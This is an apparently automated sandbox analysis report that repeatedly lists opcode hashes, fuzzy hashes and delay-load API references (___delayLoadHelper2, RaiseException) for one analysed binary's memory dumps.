                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7f47e49784eb7496e23db626945c9d9f8b4b259c4baccd26a60b3ee3eedc2ad1
                • Instruction ID: 23fc85d80ae9f437e7d8a783b6e17ae7764a86f98ce4e98a1f135022d0f99744
                • Opcode Fuzzy Hash: 7f47e49784eb7496e23db626945c9d9f8b4b259c4baccd26a60b3ee3eedc2ad1
                • Instruction Fuzzy Hash: 81B012E527CA41AC320CA11ABD02D3E022CC0C5F50370851EB50DD11C3D7805C194031
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4bb4f5888f65ad373173177e9076a799aa69966bff7a4350fb358e8d3a678ebb
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: 4bb4f5888f65ad373173177e9076a799aa69966bff7a4350fb358e8d3a678ebb
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 0c412d0c59645369ff963752784de9fe4d311675e5abc110bb91fa84529980b4
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: 0c412d0c59645369ff963752784de9fe4d311675e5abc110bb91fa84529980b4
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 150f3ffd81b1e021bd2af7b9b26c7d90638c931d37e4f7da1f41731faab72d97
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: 150f3ffd81b1e021bd2af7b9b26c7d90638c931d37e4f7da1f41731faab72d97
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 85fdd1e0c2d0b0179ef44584ac3d698118576f5f162fe710298f49f0be503e1f
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: 85fdd1e0c2d0b0179ef44584ac3d698118576f5f162fe710298f49f0be503e1f
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: cb5e7a3980e316dde763820bc350dd4ad64bf3ececac0104721311889846aab8
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: cb5e7a3980e316dde763820bc350dd4ad64bf3ececac0104721311889846aab8
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b1d832613a5f68be1dcf41c6680934c01af33aa56c9513a9c2ba08de0f443216
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: b1d832613a5f68be1dcf41c6680934c01af33aa56c9513a9c2ba08de0f443216
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f146ca993c14836a45d74d88401d5ca7265e17a0feeaaa10316a5bfbb859eb94
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: f146ca993c14836a45d74d88401d5ca7265e17a0feeaaa10316a5bfbb859eb94
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 1b03629ffe7bcb29690a196d338f7ed88e1839ce2d110f16042371e1159d3a43
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: 1b03629ffe7bcb29690a196d338f7ed88e1839ce2d110f16042371e1159d3a43
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 86703fc61856811786a1b2952d0f50e2d253a759df8d6758425f5f9b17b4c2a3
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: 86703fc61856811786a1b2952d0f50e2d253a759df8d6758425f5f9b17b4c2a3
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5d88b4afbad3d412414b24b48dd5a63a036d046218623e138c567b17a3dbf905
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: 5d88b4afbad3d412414b24b48dd5a63a036d046218623e138c567b17a3dbf905
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f4fb111947a17a7195bac9adda83b3df4915ebc52de6d3b962b39c995ad8d2d0
                • Instruction ID: f6fed302859e05ae0ff025f8adf6163d229c6ff6f9cdf17dcf505f8258994004
                • Opcode Fuzzy Hash: f4fb111947a17a7195bac9adda83b3df4915ebc52de6d3b962b39c995ad8d2d0
                • Instruction Fuzzy Hash: 6AA0129117C9437C310C61027C12C3E020CC4C1B113304409F00A900C196401C050430
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 01d81fb41cf6de7bc4f2bf2d2703ad0760c1eaf4cf032d1f0688234420039e02
                • Instruction ID: 1d55b6d1f3c8d46500540a1ca58e21fbfe284c277859e027fa6554dd6cbc2681
                • Opcode Fuzzy Hash: 01d81fb41cf6de7bc4f2bf2d2703ad0760c1eaf4cf032d1f0688234420039e02
                • Instruction Fuzzy Hash: 09A0129527C9413C310CB103BC02C3E020CC0D0B11330411AF0069008556400C050431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fb12761e3fd9839cd2b8e2b6856f7c33d9f6cbc4408766ba829986375e9adfea
                • Instruction ID: 6b992a00460de8c6d1f15712e688f6f0d702babe8c412b2487825f3781060b5d
                • Opcode Fuzzy Hash: fb12761e3fd9839cd2b8e2b6856f7c33d9f6cbc4408766ba829986375e9adfea
                • Instruction Fuzzy Hash: 6CA011AA2BCA82BC320CB203BC02C3E020CC0C0B203308A2AF00A8008AAA800C0A0832
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f0a95b7f1b123138de8624b72d1585087550c30137b3e53f84fb9e67fcdf0ffd
                • Instruction ID: 6b992a00460de8c6d1f15712e688f6f0d702babe8c412b2487825f3781060b5d
                • Opcode Fuzzy Hash: f0a95b7f1b123138de8624b72d1585087550c30137b3e53f84fb9e67fcdf0ffd
                • Instruction Fuzzy Hash: 6CA011AA2BCA82BC320CB203BC02C3E020CC0C0B203308A2AF00A8008AAA800C0A0832
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e98e4e6f1d1a7640fa6e8267e7c9e8f9d58170e0069957879128c259c9864ce8
                • Instruction ID: 6b992a00460de8c6d1f15712e688f6f0d702babe8c412b2487825f3781060b5d
                • Opcode Fuzzy Hash: e98e4e6f1d1a7640fa6e8267e7c9e8f9d58170e0069957879128c259c9864ce8
                • Instruction Fuzzy Hash: 6CA011AA2BCA82BC320CB203BC02C3E020CC0C0B203308A2AF00A8008AAA800C0A0832
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 1689062e84fd373b608a3039a0a1ffe8264fef8a7f2c63f796222e617ac7b8ad
                • Instruction ID: 6b992a00460de8c6d1f15712e688f6f0d702babe8c412b2487825f3781060b5d
                • Opcode Fuzzy Hash: 1689062e84fd373b608a3039a0a1ffe8264fef8a7f2c63f796222e617ac7b8ad
                • Instruction Fuzzy Hash: 6CA011AA2BCA82BC320CB203BC02C3E020CC0C0B203308A2AF00A8008AAA800C0A0832
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDAB2
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
